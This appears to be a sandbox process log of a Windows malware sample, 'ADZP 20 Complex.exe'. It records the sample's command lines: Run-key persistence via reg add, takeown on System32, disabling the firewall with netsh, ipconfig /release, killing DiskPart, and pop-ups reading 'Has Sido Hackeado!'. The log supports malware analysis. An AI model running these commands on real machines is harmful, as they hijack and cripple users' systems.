C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4343.tmp\4344.tmp\4345.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\44AA.tmp\44BB.tmp\44BC.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\45F2.tmp\45F3.tmp\45F4.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8A8D.tmp\8A8E.tmp\8A8F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8AAC.tmp\8AAD.tmp\8AAE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8BA6.tmp\8BA7.tmp\8BA8.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9337.tmp\9338.tmp\9339.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\979C.tmp\979D.tmp\979E.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\97BC.tmp\97BD.tmp\97BE.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A316.tmp\A317.tmp\A327.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B5C3.tmp\C092.tmp\C093.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A98E.tmp\C0E0.tmp\C0E1.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FF9D.tmp\FF9E.tmp\FFBF.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\1A1.tmp\1A2.tmp\1A3.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\635.tmp\636.tmp\637.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\683.tmp\684.tmp\685.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2E3F.tmp\2E40.tmp\2E41.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\SysWOW64\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\System32\Twain_20.dll
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2F68.tmp\2F88.tmp\2F89.bat C:\Windows\SysWOW64\Twain_20.dll"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2FF4.tmp\2FF5.tmp\2FF6.bat C:\Windows\System32\Twain_20.dll"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4EB7.tmp\4EB8.tmp\4EB9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
